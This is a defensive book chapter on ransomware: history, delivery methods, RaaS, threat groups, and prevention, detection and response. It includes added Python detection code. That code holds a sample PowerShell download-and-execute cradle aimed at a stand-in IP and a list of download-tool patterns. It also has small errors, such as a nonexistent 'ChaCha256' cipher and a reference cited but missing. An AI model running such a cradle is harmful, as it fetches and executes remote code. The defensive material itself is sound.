Open access peer-reviewed chapter

Perspective Chapter: Ransomware

Written By

Arun Warikoo

Submitted: 21 September 2022 Reviewed: 04 October 2022 Published: 24 January 2023

DOI: 10.5772/intechopen.108433

From the Edited Volume

Malware - Detection and Defense

Edited by Eduard Babulak


Abstract

Ransomware is a type of malware that encrypts files on an infected computer and withholds the decryption key until the victim pays a ransom. Ransomware has seen explosive growth over the past few years and has rapidly evolved into a highly lucrative business model. Sophisticated advanced persistent threats (APTs) employ ransomware to maximize their profits through multiple layers of monetization. New versions appear frequently, with ever-evolving tactics and techniques that make detection harder. In this chapter, we present a brief history of ransomware, the top threat actors employing it, the tactics they use, and the key strategies firms need to deploy to prevent, detect, and respond to ransomware attacks.

Keywords

  • ransomware
  • extortion
  • threat actor groups
  • tactics
  • prevention
  • detection
  • response

1. Introduction

Ransomware attacks have emerged as one of the most prominent cyberattacks of the last 5 years, affecting organizations globally. The Verizon Data Breach Investigations Report (DBIR) 2021 states that 37% of global organizations said they were hit by ransomware [1]. The number of ransomware attacks rose 151% year-on-year by mid-2021 [2].

Ransomware is a family of malware designed to block or limit victims' access to their systems, either by locking the screen or by encrypting files, until a ransom is paid. Ransomware operators demand that the victim pay in cryptocurrency, usually Bitcoin.

Ransomware variants are of two types, encryptors and lockers [3]. Encrypting ransomware encrypts the files on the victim's machine and demands a ransom for the decryption key. Lockers do not encrypt files; they lock the victim's system so that the files are inaccessible. Because a locker leaves the data itself intact, it can usually be removed without paying, which is why encryptors dominate the threat landscape today.

Ransomware tactics and techniques have evolved considerably over the years. The evolution can be broken down into three periods: before 2014, 2015 to 2017, and after 2017. Before 2014, ransomware attacks were widespread but indiscriminate, with very low ransom demands. From 2015, attackers began deploying ransomware post-exploitation, that is, only after they had already compromised the network. This reduced the number of victims an attacker could hit, but gave operators far more control over deployment: files across the victim's network could be encrypted in a targeted, reliable way, which justified much higher ransom demands. After 2017, the ransomware threat landscape saw the emergence of ransomware as a service (RaaS) and big game hunting (BGH). Big game hunting refers to attackers using ransomware to target large, high-value organizations [4].

Subsequent sections give a brief history of ransomware, describe how it is distributed, profile high-profile ransomware groups, and explain how to prevent, detect, and respond to ransomware attacks.


2. A brief history of ransomware

This section gives a brief history of ransomware, from its inception as a petty cybercriminal act to what is now a billion-dollar cyber-crime industry.

The first known ransomware attack occurred in 1989 and targeted the healthcare sector. Joseph Popp, an AIDS researcher, carried out the attack by mailing 20,000 floppy disks to attendees of the WHO AIDS conference [5]. He used social engineering, claiming that the disks contained a questionnaire to determine an individual's risk of acquiring AIDS. The disks also carried malware, dubbed the AIDS Trojan, that encrypted file names on the victim's machine and displayed a message demanding that $189 be sent to a P.O. box in Panama in exchange for access to the files [5]. Because the AIDS Trojan used a simple symmetric cipher on file names only, a decryption tool soon became available [6].

Figure 1 highlights the timeline on ransomware since the launch of AIDS Trojan in 1989 to Hive in 2022.

Figure 1. Ransomware timeline.

The first modern ransomware, GPCode (also known as GPCoder), appeared in 2004 and infected systems via phishing emails [6]. It used symmetric encryption to encrypt files and demanded $20 for the decryption key [5]. 2006 saw the launch of Archievus, the first ransomware to use strong, 1024-bit RSA encryption [5]. Reveton emerged in 2012 as a locker that displayed fraudulent law-enforcement messages accusing victims of a crime and threatening jail time if the "fine" was not paid [5]. In 2013, CryptoLocker arrived, delivered via phishing emails; it used 2048-bit RSA and combined locker and crypto behaviour [5]. CryptoWall gained notoriety after CryptoLocker's takedown in 2014 and was widely distributed through exploit kits and spam campaigns. TeslaCrypt gained notoriety in 2015 and targeted computer gamers; after infection it demanded a $500 ransom for the decryption key, doubling the amount if the victim delayed.

Petya emerged in 2016 as the first ransomware variant that, rather than encrypting individual files, overwrote the master boot record and encrypted the master file table, locking victims out of the entire disk far faster than file-by-file encryption [5]. WannaCry shocked the world in 2017, hitting hundreds of thousands of machines in more than 150 countries; it spread as a worm using EternalBlue, an SMBv1 exploit leaked from the National Security Agency [5]. In June 2017, a major attack on Ukraine used a new Petya-derived variant, NotPetya, which soon spread to organizations globally. In 2018, the sophisticated Ryuk variant appeared and became one of the most successful campaigns of its time; Ryuk attacks were targeted, and ransom demands typically ranged from 15 to 50 Bitcoin, roughly $100,000 to $500,000 at the time [7]. REvil, also known as Sodinokibi, first appeared in April 2019 and was immediately successful [8]. Maze, also discovered in 2019, introduced double extortion, in which data are exfiltrated before the ransomware is deployed. Shortly after Maze disbanded in 2020, the Egregor double-extortion RaaS appeared. 2020 also saw the emergence of Conti and DarkSide, which were responsible for major incidents globally. LockBit 2.0, a new LockBit variant with advanced capabilities, appeared in 2021. LockBit 3.0, the current version, was discovered in June 2022 and added a bug bounty program, inviting researchers to report flaws in the group's own software and infrastructure [9]. 2022 saw the collapse of Conti and the emergence of new groups such as Black Basta, Hive, and Quantum, which continue to drive the ransomware threat landscape [10].

Figure 2 highlights significant ransomware incidents that have occurred over the last 5 years.

Figure 2. Significant ransomware incidents.

Figure 3 shows the various stages involved in a ransomware attack.

Figure 3. Ransomware attack chain.


3. Distribution methods

Ransomware is spread through multiple distribution methods. These are as follows:

Phishing. The most common attack vector, as shown in Figure 4. Attackers send an email designed to lure the victim into opening a weaponized Office attachment. When the user opens the Word or Excel document and enables macros, the macro runs a PowerShell command that downloads a second-stage malware from the command and control (C2) server. Additional payloads are downloaded for lateral movement, and once the attacker controls the Active Directory (AD) domain, ransomware is fetched as the final payload and pushed to many devices at once. Each hop in this chain leaves a detectable trace: an Office process spawning PowerShell, an encoded or download-cradle command line, and outbound connections to a domain the host has never contacted before.

Figure 4. Attack vector: phishing.

Exploit kits. An exploit kit is a toolkit that exploits vulnerabilities on a victim's system during web browsing. When the user visits a compromised website, the browser is redirected to a landing page that fingerprints the machine for browser or plug-in vulnerabilities and, if one is found, delivers malware. Ransomware groups use malvertising to redirect users to the attacker's site, where the exploit runs and eventually leads to ransomware deployment (Figure 5).

Figure 5. Attack vector: exploit kit.

Buying credentials from access brokers. Attackers buy credentials from initial access brokers (IABs) to gain initial access. Remote Desktop Protocol (RDP) credentials are the most common kind used to gain a foothold, typically against RDP services exposed to the Internet without multi-factor authentication (MFA).

Exploiting vulnerabilities. Ransomware operators also gain initial access by exploiting vulnerabilities in Internet-facing applications and appliances such as VPN gateways.

Third-party vendors. The supply chain has become the latest attack vector leading to ransomware deployment: compromising a vendor, managed service provider, or software update channel gives the attacker access to many downstream victims at once.


4. Ransomware threat landscape

The modern ransomware threat landscape is driven by the advent of the ransomware as a service (RaaS) business model and the adoption of multiple levels of extortion.

4.1 Ransomware as a service

Ransomware as a service (RaaS) is a business model in which ransomware operators lease their ransomware to customers, known as affiliates, in exchange for a cut of the ransom. The affiliates carry out the attacks, while negotiations with the victim are handled by the operator.

RaaS has taken ransomware to a whole new level and is one of the primary reasons ransomware attacks have become so frequent. The business model is a win-win for every party involved. A report by CrowdStrike, a cybersecurity firm, states that ransomware revenues in 2020 were around $20 billion, up from $11.5 billion the previous year [11].

The operator now focuses only on developing and monetizing its product, while less sophisticated actors with little technical skill can buy the service and launch targeted attacks. Figure 6 shows the RaaS ecosystem, which also comprises initial access brokers (IABs) and mules. Access brokers are an important component: they scan networks for vulnerabilities and harvest credentials, then sell that access to affiliates, who use it for initial access during an intrusion. The RaaS operators handle ransom negotiations with the victim. Mules complete the ecosystem by laundering the cryptocurrency proceeds and converting them into fiat currency.

Figure 6. The RaaS ecosystem.

4.2 Extortion

The addition of extortion tactics beyond encryption alone has become one of the major drivers of high-profile ransomware attacks in the last few years. There are four levels of extortion in use, shown in Figure 7.

Figure 7. Types of ransomware extortion.

Single extortion refers to deploying ransomware post-exploitation; the attacker demands a ransom in exchange for decrypting the files.

Double extortion refers to exfiltrating data before deploying the ransomware; the attacker then threatens to leak the data publicly. The Maze group pioneered this tactic, and other threat actors followed suit, setting up dedicated leak sites (DLS) on which stolen data are published. Double extortion defeats a backup-only recovery strategy, since restoring files does nothing about the stolen copy.

In 2020, threat actors took extortion a step further and added DDoS attacks to the encryption and data-exposure threats. This is known as triple extortion and was first carried out by the SunCrypt and RagnarLocker operators in the second half of 2020 [12].

In 2021, a fourth level, quadruple extortion, appeared. Here ransomware operators also contact the victim's customers and stakeholders directly, adding further pressure. DarkSide operators have used quadruple extortion in some attacks, launching DDoS attacks and contacting customers through dedicated call centers [12].


5. Ransomware groups

This section highlights some of the high-profile threat actors that have shaped modern ransomware campaigns.

Wizard Spider, the group behind Conti, is a Russia-based cybercriminal group operational since 2016 [13]. It is known as the operator of the Ryuk and Conti ransomware variants and practices big game hunting (BGH). The group used Ryuk from September 2018 before switching to Conti in 2020 [14].

Carbon Spider, also known as FIN7, is another Russia-based cybercriminal group, operating since 2013. It pivoted to ransomware and big game hunting in 2020 and marketed its own RaaS program, DarkSide [15]. In May 2021, the Colonial Pipeline ransomware attack made headlines around the world; the FBI attributed it to DarkSide [16].

Pinchy Spider is a sophisticated cybercriminal group operational since 2018 and known as the operator of the REvil RaaS program [17]. It is associated with some of the most high-profile ransomware attacks in history.

The LockBit group is a sophisticated cybercriminal group operational since 2019, known for consistently developing new tactics and techniques to stay ahead of rival ransomware groups [12]. In 2021, it released LockBit 2.0 under the RaaS model; its operators allegedly work only with experienced penetration testers [18].

BlackByte is a ransomware-as-a-service operation that first emerged in July 2021 and gains a foothold primarily by exploiting vulnerabilities in the victim's environment [19].

Table 1 lists significant ransomware families over the years with details such as operator, year of first operation, implementation language, encryption scheme, target platforms, business model, extortion level, and whether the group runs a bug bounty program.

Ransomware Name | Operated By | Operational Since | Written In | Encryption | Target Platforms | RaaS Model | Extortion | Bug Bounty Program
TeslaCrypt | NA | 2015 | C++ | AES-256 | Windows | No | No | No
WannaCry | Lazarus Group | 2017 | C/C++ | RSA | Windows | No | No | No
BitPaymer | Indrik Spider | 2017 | C/C++ | RC4 and RSA | Windows | No | No | No
DoppelPaymer | Doppel Spider | 2019 | C | RC4 and RSA | Windows | No | No | No
SunCrypt | SunCrypt | 2019 | Go, C and C++ | RSA | Windows | Yes | Triple | No
Clop | FIN11 aka TA505 | 2019 | C | RC4 | Windows | Yes | Double | No
RagnarLocker | RagnarGroup | 2019 | C | Salsa20, RSA-1024 | Windows | | Double | No
Maze | Twisted Spider | 2019 | C | ChaCha20 | Windows | Yes | Double | No
Egregor | | 2020 | C/C++ | ChaCha8, RSA-1024 | Windows | Yes | Double | No
Ryuk | Wizard Spider aka Conti | 2018 | C/C++ | AES-256, RSA-4096 | Windows | Yes | Single | No
Conti | Wizard Spider | 2020 | C/C++ | ChaCha8, RSA-1024 | Windows, Linux | Yes | Double | No
DarkSide | Carbon Spider aka FIN7 | 2020 | C | Salsa20, RSA-1024 | Windows, Linux | Yes | Double | No
BlackMatter | | 2021 | C | Salsa20, RSA-1024 | Windows, Linux | Yes | Double | No
REvil aka Sodinokibi, GandCrab | Pinchy Spider | 2019 | C | RSA | Windows, Linux | Yes | Triple | No
LockBit | LockBit Group | 2019 | C | AES-128 | Windows | Yes | Double | No
LockBit 2.0 | LockBit Group | 2021 | C | AES-128, Curve25519 | Windows | Yes | Double | No
LockBit 3.0 | LockBit Group | 2022 | C | ChaCha256 | Windows | Yes | Double | Yes
HelloKitty | FiveHands Group | 2021 | C++ | AES-256, RSA-2048 | Windows | Yes | Double | No
AvosLocker | Avos Group | 2021 | C/C++ | AES-256 | Windows, Linux, VMware ESXi | Yes | Double | No
BlackCat aka ALPHV | BlackCat group | 2021 | Rust | AES, ChaCha20 | Windows, Linux, VMware ESXi | Yes | Triple | No
Black Basta | Black Basta group | 2022 | C++ | ChaCha20, RSA-4096 | Windows, Linux, VMware ESXi | Yes | Double | No

Table 1. Ransomware families.


6. Ransomware prevention, detection, and response

Organizations need to take a multipronged approach to preventing and defending against ransomware. The best strategy combines prevention, detection, and recovery capabilities.

6.1 Prevention

Organizations need controls covering every distribution method highlighted in Section 3, deployed at multiple layers as part of defense in depth.

At the network layer, organizations should deploy an email security gateway and a sandbox to block phishing, the most common attack vector for ransomware. Web application firewalls (WAFs) help prevent initial access through exploits against public-facing applications. Intrusion prevention systems (IPS) and content filtering help block communication with command and control servers. Most sophisticated ransomware operations also exfiltrate data for extortion, so data loss prevention (DLP) solutions are an important control against data leakage.

At the endpoint layer, in addition to an anti-virus (AV) solution, organizations need endpoint detection and response (EDR) to detect malicious activity such as an Office application spawning a script interpreter. Organizations should also configure their information technology (IT) environment so that macros in documents received from outside the network cannot be enabled, without disrupting business processes; in Microsoft Office this is the "Block macros from running in Office files from the Internet" policy, which acts on files carrying the Mark of the Web and is the default in current Microsoft 365 Apps builds. Installing browser protection and an ad blocker on end-user workstations is also advisable, as it prevents JavaScript-based malware and malvertising redirects from executing on the system [20].

Organizations must also run a robust vulnerability management program focused on hardening workstations and servers. Attackers use exploit kits to exploit vulnerabilities in systems and technologies; for example, the Locky ransomware was frequently delivered via the Rig exploit kit, which targeted Adobe Flash vulnerabilities [20]. It is therefore imperative to keep systems and applications fully patched and up to date, prioritizing Internet-facing services and anything an exploit kit or initial access broker could reach.

Most ransomware distribution methods require end-user interaction, so organizations need robust security awareness training that teaches employees how attackers use social engineering to trick them.

6.2 Detection

Detective controls play an important role in the fight against ransomware. In a modern ransomware attack there is significant dwell time between initial compromise and the deployment of the ransomware. With big game hunting, attackers spend considerable time post-compromise identifying high-value targets; dwell time can be as little as a few days or as long as several weeks. This window gives defenders the opportunity to detect unusual activity that points to an ongoing ransomware attack before encryption begins.

Ransomware can be detected by looking for the behaviors that ransomware variants exhibit. These include network traffic to C2 servers and the associated Domain Name System (DNS) queries [21]. Detective controls such as an intrusion detection system (IDS) and a security information and event management (SIEM) platform ship with signatures and rules for such events. In addition, custom rules can target specific behaviors: anomalous SMB traffic, creation of new privileged accounts, anomalous outbound traffic, suspicious process trees, and PowerShell activity. Alerts from detective controls are investigated in a Security Operations Centre (SOC). Such alerts have a high false-positive rate, so SOC analysts must work with the threat detection team to tune the platforms and reduce the noise [22].
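The phishing chain in Section 3 and the custom rules above can be turned into concrete detection logic. The following Python is an added example, not code from the chapter: it runs three process-level rules (Office parent spawning a script host, PowerShell with an encoded command, a download cradle in the effective command line) and one account rule (member added to a privileged group) over constructed events shaped like parsed Sysmon Event ID 1 and Windows Security Event ID 4728 records. The field names, hostnames, the 203.0.113.10 address and the stage-2 payload are assumptions for illustration.

```python
"""Detection logic for the early stages of a phishing-led ransomware intrusion.

Added example, not part of the chapter. Events are constructed to look like
parsed Windows telemetry: Sysmon Event ID 1 (process creation) and Security
Event ID 4728 (member added to a security-enabled global group). Field names,
hostnames and the payload are assumptions for illustration.
"""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}
# Common PowerShell download-cradle fragments (second-stage fetch from C2).
DOWNLOAD_CRADLE = re.compile(
    r"(Invoke-WebRequest|DownloadString|DownloadFile|Net\.WebClient|"
    r"Start-BitsTransfer|\biwr\b|\bcurl\b|\bwget\b)", re.I)
# -EncodedCommand and its abbreviations, followed by the base64 blob.
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def basename(image: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return image.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str):
    """Plaintext of a PowerShell -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(events):
    """Run the rules over parsed events; return (rule, host, detail) tuples."""
    alerts = []
    for ev in events:
        if ev["event_id"] == 1:
            parent, image = basename(ev["parent_image"]), basename(ev["image"])
            decoded = (decode_encoded_command(ev["command_line"])
                       if image in {"powershell.exe", "pwsh.exe"} else None)
            # Match cradle patterns on the decoded script when one is present.
            effective = decoded if decoded is not None else ev["command_line"]
            if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
                alerts.append(("office_spawns_script_host", ev["host"], f"{parent} -> {image}"))
            if decoded is not None:
                alerts.append(("encoded_powershell", ev["host"], decoded))
            if DOWNLOAD_CRADLE.search(effective):
                alerts.append(("download_cradle", ev["host"], effective))
        elif ev["event_id"] == 4728 and ev["group"] in PRIVILEGED_GROUPS:
            alerts.append(("privileged_group_add", ev["host"],
                           f"{ev['member']} added to {ev['group']} by {ev['subject']}"))
    return alerts


# Constructed sample: the payload is encoded here the way a malicious macro would.
STAGE2_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage2.ps1')"
ENCODED = base64.b64encode(STAGE2_PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"event_id": 1, "host": "WS-042", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\Invoice_4471.docm"'},
    {"event_id": 1, "host": "WS-042",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"event_id": 1, "host": "WS-042", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "command_line": "svchost.exe -k netsvcs -p"},
    {"event_id": 4728, "host": "DC01", "subject": "CORP\\alice",
     "member": "CORP\\svc-backup", "group": "Domain Admins"},
    {"event_id": 4728, "host": "DC01", "subject": "CORP\\hr-admin",
     "member": "CORP\\bob", "group": "Sales"},
]

if __name__ == "__main__":
    for rule, host, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {host}: {detail}")
```

The sample yields three alerts for the Word-to-PowerShell event and one for the Domain Admins change; the benign Word launch, the svchost.exe start and the Sales group change produce nothing. Decoding `-EncodedCommand` before pattern matching matters because the raw command line of an encoded launch contains no recognizable keyword at all; in a SIEM the same logic is expressed as a parent/child process rule plus a decoded-script rule, and the privileged-group rule is the kind of custom rule the paragraph above refers to.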

Organizations need to develop cyber fusion capabilities to tackle advanced persistent threats. This can be achieved by creating a Cyber Defense Centre (CDC) comprising teams such as the CSIRT, red team, vulnerability assessment (VA), threat detection, and cyber threat intelligence (CTI). Threat intelligence plays a vital role in providing intel on ongoing campaigns so that enterprise defenders are ready for the threat and know what to look for. Organizations should also run tabletop exercises quarterly, based on specific scenarios drawn from the threat intelligence team's reporting.

6.3 Response

It is imperative to have a ransomware incident response plan that is executed by the organization's computer security incident response team (CSIRT).

Identify the infected systems within the network and isolate them immediately, by disconnecting them from the network rather than powering them off, so that volatile evidence is preserved. Determining the scope of the infection is critical. Look for symptoms such as changed file names or extensions, ransom notes, and service tickets from employees who cannot access their files.

Secure your backups by taking them offline and verify that they are not affected by running a full scan [23]. Restore files from backup only after the affected devices have been cleaned or rebuilt, the malware has been eradicated, and anti-virus is running; otherwise the restored data will simply be encrypted again.

The incident response team must also identify the attack vector and build an attack timeline. This helps establish how the attack happened, identify control gaps, and prevent recurrence.

Report the incident to law enforcement immediately, as typical ransomware attacks involve data theft. In the United States, report to the nearest FBI field office, which can help identify those responsible and prevent future attacks [23].

Once normal operations resume, conduct a post-incident review to capture the lessons learned from the attack.
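The first two steps of the plan, scoping the infection by its file-system symptoms and confirming that backups are clean before restoring, can be scripted. The following Python is an added example, not code from the chapter: it flags files whose document extension has a foreign extension appended and whose content is near-random, records ransom notes, and reuses the same scan as a gate on a backup set. The directory trees are constructed in a temporary directory; the note names, the `.locked` marker extension and the entropy threshold are assumptions to be replaced with what the identified variant actually uses.

```python
"""Triage helper for scoping a ransomware incident on a file share.

Added example, not part of the chapter. It flags files that look encrypted
(a foreign extension appended to a normal document extension plus
near-random content), records ransom notes, and runs the same scan over a
backup copy to confirm it is clean before restoration. The directory trees
are constructed in a temporary directory; the note names, marker extension
and entropy threshold are assumptions to adjust to the variant identified.
"""
import math
import os
import tempfile
from collections import Counter
from pathlib import Path

# Assumed note file names; replace with the ones dropped by the identified variant.
RANSOM_NOTE_NAMES = {"how_to_decrypt.txt", "readme-restore.txt"}
DOC_EXTENSIONS = {".docx", ".xlsx", ".pptx", ".pdf", ".jpg", ".txt", ".sql", ".bak"}
ENTROPY_THRESHOLD = 7.5  # bits per byte; encrypted data sits close to 8.0
HEAD_BYTES = 4096        # enough of the file to judge randomness cheaply


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte of the buffer (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(path: Path) -> bool:
    """True when a document extension has a foreign one appended and content is near-random."""
    suffixes = [s.lower() for s in path.suffixes]
    appended = (len(suffixes) >= 2 and suffixes[-2] in DOC_EXTENSIONS
                and suffixes[-1] not in DOC_EXTENSIONS)
    if not appended:
        return False
    with path.open("rb") as fh:
        head = fh.read(HEAD_BYTES)
    return shannon_entropy(head) > ENTROPY_THRESHOLD


def scan_tree(root: Path) -> dict:
    """Walk a tree and report encrypted files, ransom notes and the extensions used."""
    report = {"files_scanned": 0, "encrypted": [], "ransom_notes": [],
              "appended_extensions": Counter()}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        report["files_scanned"] += 1
        rel = path.relative_to(root).as_posix()
        if path.name.lower() in RANSOM_NOTE_NAMES:
            report["ransom_notes"].append(rel)
        elif looks_encrypted(path):
            report["encrypted"].append(rel)
            report["appended_extensions"][path.suffix.lower()] += 1
    return report


def backup_is_clean(root: Path) -> bool:
    """Gate for restoration: no encrypted files and no ransom notes in the backup set."""
    report = scan_tree(root)
    return not report["encrypted"] and not report["ransom_notes"]


def build_sample() -> tuple:
    """Construct a hit share and a clean backup copy under a temporary directory."""
    base = Path(tempfile.mkdtemp(prefix="ir-triage-"))
    share, backup = base / "share", base / "backup"
    (share / "finance").mkdir(parents=True)
    backup.mkdir()
    # Encrypted files: original extension kept, marker appended, random content.
    (share / "finance" / "budget.xlsx.locked").write_bytes(os.urandom(8192))
    (share / "report.docx.locked").write_bytes(os.urandom(8192))
    (share / "notes.txt").write_text("weekly status: nothing to report\n" * 50)
    (share / "HOW_TO_DECRYPT.txt").write_text("Your files are encrypted. Contact us to restore them.\n")
    (backup / "report.docx").write_text("quarterly report draft\n" * 100)
    (backup / "notes.txt").write_text("weekly status: nothing to report\n" * 50)
    return share, backup


if __name__ == "__main__":
    share, backup = build_sample()
    hit = scan_tree(share)
    print(f"{share}: {len(hit['encrypted'])} encrypted file(s), "
          f"extensions {dict(hit['appended_extensions'])}, notes {hit['ransom_notes']}")
    print(f"{backup}: clean for restore = {backup_is_clean(backup)}")
```

Entropy alone is a weak signal because compressed formats such as .docx, .jpg and .pdf already sit above 7 bits per byte; the appended-extension check is therefore required as well, and a ransom note in the same tree is the strongest confirmation. Run against each share and host in turn, the extension counter also tells the team which variant they are dealing with, which feeds the attack-timeline and law-enforcement steps that follow.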


7. Conclusion

Ransomware has become one of the most prevalent cybercrimes that threat actors use to maximize profit. Nation-state actors have also employed ransomware to further their geopolitical interests. Organizations can no longer rely on resilience and backups alone to thwart such attacks: threat actors have evolved their tactics and now employ multiple layers of extortion. The advent of RaaS has made matters worse, as less sophisticated attackers can launch ransomware attacks simply by buying the service.

Organizations need a multipronged strategy to prevent, detect, and respond to such persistent attacks. Firms should invest in a cyber fusion model that builds collaboration and cohesion between the various cyber defense teams. Threat intelligence exchange with ISACs and law enforcement agencies is essential for understanding the campaigns of interest. Adopting a Zero Trust approach to network design is also recommended.


Nomenclature

AD: Active Directory
AIDS: Acquired Immunodeficiency Syndrome
APT: Advanced Persistent Threat
ATT&CK: Adversarial Tactics, Techniques, and Common Knowledge
AV: Anti-virus
BBP: Bug Bounty Program
BGH: Big Game Hunting
BTC: Bitcoin
C2: Command and Control
CDC: Cyber Defense Centre
CISA: Cybersecurity and Infrastructure Security Agency
CSIRT: Computer Security Incident Response Team
CTI: Cyber Threat Intelligence
CVSS: Common Vulnerability Scoring System
DBIR: Data Breach Investigations Report
DLP: Data Loss Prevention
DLS: Dedicated Leak Site
DGA: Domain Generation Algorithm
DNS: Domain Name System
DoS: Denial of Service
DDoS: Distributed Denial of Service
EDR: Endpoint Detection and Response
ECDSA: Elliptic Curve Digital Signature Algorithm
FBI: Federal Bureau of Investigation
IAB: Initial Access Broker
IT: Information Technology
IDS: Intrusion Detection System
IPS: Intrusion Prevention System
IR: Incident Response
ISAC: Information Sharing and Analysis Center
MFA: Multi-Factor Authentication
NIST: National Institute of Standards and Technology
OSINT: Open Source Intelligence
RaaS: Ransomware as a Service
RDP: Remote Desktop Protocol
RSA: Rivest-Shamir-Adleman
SIEM: Security Information and Event Management
SOC: Security Operations Center
SQLi: Structured Query Language Injection
TB: Terabyte
TTP: Tactics, Techniques, and Procedures
VA: Vulnerability Assessment
VPN: Virtual Private Network
XSS: Cross-Site Scripting
WAF: Web Application Firewall
WHO: World Health Organization

References

  1. Bassett G, Hylender D, Langlois P, Pinto A, Widup S. 2021 Verizon Data Breach Investigations Report [Internet]. 2021. Available from: https://www.researchgate.net/publication/351637233_2021_Verizon_Data_Breach_Investigations_Report [Accessed: September 19, 2022]
  2. SonicWall. 2021 SonicWall Cyber Threat Report: Mid-Year Update [Internet]. 2021. Available from: https://www.sonicwall.com/resources/white-papers/mid-year-2021-sonicwall-cyber-threat-report/ [Accessed: September 19, 2022]
  3. Aurangzeb S, Aleem M, Iqbal M, Islam A. Ransomware: A Survey and Trends [Internet]. 2017. Available from: https://www.researchgate.net/publication/317380115_Ransomware_A_Survey_and_Trends [Accessed: September 19, 2022]
  4. CrowdStrike. Cyber Big Game Hunting [Internet]. 2022. Available from: https://www.crowdstrike.com/cybersecurity-101/cyber-big-game-hunting [Accessed: September 19, 2022]
  5. Harford I. The history and evolution of ransomware [Internet]. 2021. Available from: https://www.techtarget.com/searchsecurity/feature/The-history-and-evolution-of-ransomware [Accessed: September 16, 2022]
  6. Richardson R, North M. Ransomware: Evolution, Mitigation and Prevention. Faculty Publications, no. 4276; 2017. Available from: https://digitalcommons.kennesaw.edu/facpubs/4276
  7. Constantin L. Ryuk explained: Targeted, devastatingly effective ransomware [Internet]. 2021. Available from: https://www.csoonline.com/article/3541810/ryuk-explained-targeted-devastatingly-effective-ransomware.html [Accessed: September 16, 2022]
  8. Constantin L. REvil ransomware explained: A widespread extortion operation [Internet]. 2021. Available from: https://www.csoonline.com/article/3597298/revil-ransomware-explained-a-widespread-extortion-operation.html [Accessed: September 16, 2022]
  9. Myers L. LockBit 3.0 Ransomware Abuses Windows Defender to Load Cobalt Strike [Internet]. 2022. Available from: https://blogs.blackberry.com/en/2022/08/lockbit-3-0-ransomware-abuses-windows-defender-to-load-cobalt-strike [Accessed: September 19, 2022]
  10. Righi I. Ransomware in Q2 2022: Ransomware is Back in Business [Internet]. 2022. Available from: https://www.digitalshadows.com/blog-and-research/ransomware-in-q2-2022-ransomware-is-back-in-business/ [Accessed: September 19, 2022]
  11. Baker K. Ransomware as a Service (RaaS) Explained [Internet]. 2022. Available from: https://www.crowdstrike.com/cybersecurity-101/ransomware/ransomware-as-a-service-raas/ [Accessed: September 19, 2022]
  12. Trend Micro Research. Ransomware Spotlight: LockBit [Internet]. 2022. Available from: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-lockbit [Accessed: September 13, 2022]
  13. Feeley B, Hartley B. Sin-ful Spiders: WIZARD SPIDER and LUNAR SPIDER Sharing the Same Web [Internet]. 2019. Available from: https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/ [Accessed: September 17, 2022]
  14. Hanel A. Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware [Internet]. 2019. Available from: https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/ [Accessed: September 17, 2022]
  15. Sood K, Hurley S, Arsene L. DarkSide Goes Dark: How CrowdStrike Falcon Customers Were Protected [Internet]. 2021. Available from: https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/ [Accessed: September 17, 2022]
  16. Osborne C. DarkSide explained: The ransomware group responsible for Colonial Pipeline attack [Internet]. 2021. Available from: https://www.zdnet.com/article/darkside-the-ransomware-group-responsible-for-colonial-pipeline-cyberattack-explained/ [Accessed: September 17, 2022]
  17. Meyers A. The Evolution of PINCHY SPIDER from GandCrab to REvil [Internet]. 2021. Available from: https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/ [Accessed: September 17, 2022]
  18. Elsad A, Gumarin JR, Barr A. LockBit 2.0: How This RaaS Operates and How to Protect Against It [Internet]. 2022. Available from: https://unit42.paloaltonetworks.com/lockbit-2-ransomware/ [Accessed: September 18, 2022]
  19. Elsad A. Threat Assessment: BlackByte Ransomware [Internet]. 2022. Available from: https://unit42.paloaltonetworks.com/blackbyte-ransomware/ [Accessed: September 19, 2022]
  20. Liska A, Gallo T. Ransomware: Defending Against Digital Extortion. O'Reilly; 2016. pp. 53-55. ISBN: 978-1-491-96788-1
  21. Berrueta E, Morato D, Magaña E, Izal M. A Survey on Detection Techniques for Cryptographic Ransomware. IEEE Access; 2019. DOI: 10.1109/ACCESS.2019.2945839
  22. Hills M, editor. Why Cyber Security Is a Socio-Technical Challenge: New Concepts and Practical Measures to Enhance Detection. Nova; 2016. p. 188. ISBN: 978-1-53610-090-7
